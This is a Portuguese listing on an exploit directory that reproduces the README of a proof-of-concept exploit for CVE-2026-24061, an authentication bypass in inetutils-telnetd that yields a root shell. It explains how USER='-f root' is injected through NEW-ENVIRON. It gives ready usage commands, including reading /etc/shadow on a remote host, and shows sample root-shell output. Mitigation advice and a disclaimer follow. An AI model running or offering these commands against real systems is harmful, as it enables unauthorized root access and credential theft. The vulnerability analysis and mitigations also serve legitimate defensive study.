Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — inetutils-telnetd Bypass de Autenticação - funcional | Kitploit
Ferramentas/GitHubGitHub/balgan/cve-2026-24061
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança de RedeTestes de PenetraçãoAutenticação
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd Bypass de Autenticação - funcional

Ver Repositório
423há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24061 — Bypass de Autenticação no inetutils-telnetd

Um exploit de prova de conceito para a vulnerabilidade de bypass de autenticação no GNU inetutils-telnetd.

Visão Geral

CVE-2026-24061 é uma vulnerabilidade crítica de bypass de autenticação que afeta as versões 1.9.3 a 2.7 do inetutils-telnetd. Ela permite que um atacante remoto obtenha um shell de root em sistemas vulneráveis sem fornecer nenhuma credencial.

Detalhes da Vulnerabilidade

CampoValor
ID CVECVE-2026-24061
Software AfetadoGNU inetutils-telnetd
Versões Afetadas1.9.3 – 2.7
Tipo de VulnerabilidadeBypass de Autenticação
Pontuação CVSSCrítica
Vetor de AtaqueRede

Como Funciona

A vulnerabilidade explora uma falha na forma como o telnetd lida com a variável de ambiente USER recebida por meio da opção TELNET NEW-ENVIRON (RFC 1572) durante a negociação do protocolo.

  1. Negociação do Protocolo TELNET: Quando um cliente se conecta, o servidor e o cliente negociam capacidades, incluindo a opção NEW-ENVIRON, que permite ao cliente enviar variáveis de ambiente.

  2. Valor Malicioso de USER: O exploit envia USER=-f root como uma variável de ambiente durante essa fase de negociação.

  3. Passagem Insegura de Argumentos: O telnetd vulnerável passa esse valor sem sanitização para o programa login.

  4. Injeção de Comandos: O programa login interpreta -f root como flags de linha de comando:

    • -f = "forçar login sem autenticação"
    • root = o nome de usuário para fazer login
  5. Acesso Root: O atacante obtém um shell de root sem nunca ser solicitado a fornecer uma senha.

O Problema Central

Cliente envia:  USER = "-f root"
telnetd executa:  login -f root
Resultado:        Shell de root concedido sem autenticação

Isso é equivalente a executar USER='-f root' telnet -a localhost em um sistema com um telnetd vulnerável.

Requisitos

  • Python 3.6+
  • Sem dependências externas (usa apenas a biblioteca padrão)

Instalação

git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

Uso

./exploit.py [OPÇÕES] <alvo>

Opções

OpçãoDescriçãoPadrão
hostNome de host ou endereço IP do alvoObrigatório
-p, --portPorta do alvo23
-u, --userValor de USER a injetar-f root
-c, --commandExecutar um único comando (não interativo)Nenhum
-t, --timeoutTempo limite de conexão em segundos10

Exemplos

Shell de root interativo em localhost:

./exploit.py localhost

Shell de root interativo em host remoto:

./exploit.py 192.168.1.100

Executar um único comando e sair:

./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

Fazer login como um usuário diferente:

./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

Porta não padrão:

./exploit.py -p 2323 localhost

Combinar opções:

./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

Modo Interativo

Quando executado sem a flag -c, o exploit o leva a um shell interativo:

  • Suporte completo a TTY com tratamento adequado do terminal
  • Pressione Ctrl+] para sair e fechar a conexão
  • Pressione Ctrl+C para interromper

Exemplo de Saída

╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - Bypass de Autenticação no inetutils-telnetd ║
║  Afeta: inetutils-telnetd 1.9.3 - 2.7                        ║
╚══════════════════════════════════════════════════════════════╝

[*] Conectado a 192.168.1.100:23
[*] Negociando opções TELNET...
[*] Acordo sobre NEW-ENVIRON (enviando USER='-f root')
[+] USER='-f root' enviado via NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

Mitigação

Ações Imediatas

  1. Desative o telnetd: Se não for estritamente necessário, desative o serviço telnet completamente

    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. Use SSH em vez disso: Substitua o telnet por SSH para acesso remoto

    sudo apt install openssh-server
    
  3. Regras de firewall: Bloqueie a porta 23 de redes não confiáveis

    sudo ufw deny 23/tcp
    

Correção de Longo Prazo

  • Atualize para uma versão corrigida do inetutils quando disponível
  • Monitore avisos do fornecedor para patches de segurança

Detalhes Técnicos

O exploit implementa um cliente TELNET mínimo que:

  1. Estabelece uma conexão TCP com o alvo
  2. Responde às negociações de opções TELNET (DO/DONT/WILL/WONT)
  3. Quando o servidor solicita variáveis de ambiente via NEW-ENVIRON:
    • Envia USER=-f root na resposta ENV_IS
  4. Lida com negociações de tipo de terminal (TTYPE) e tamanho de janela (NAWS)
  5. Fornece modos interativo ou de execução de comandos

RFCs Relevantes

  • RFC 854 — Especificação do Protocolo TELNET
  • RFC 1572 — Opção de Ambiente TELNET

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.

  • Use este exploit somente em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
  • O acesso não autorizado a sistemas de computador é ilegal na maioria das jurisdições
  • Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta

Licença

Licença MIT — Consulte LICENSE para obter detalhes.

Referências

  • Detalhes do CVE-2026-24061
  • GNU inetutils
  • Protocolo TELNET RFC 854
Baixar ferramenta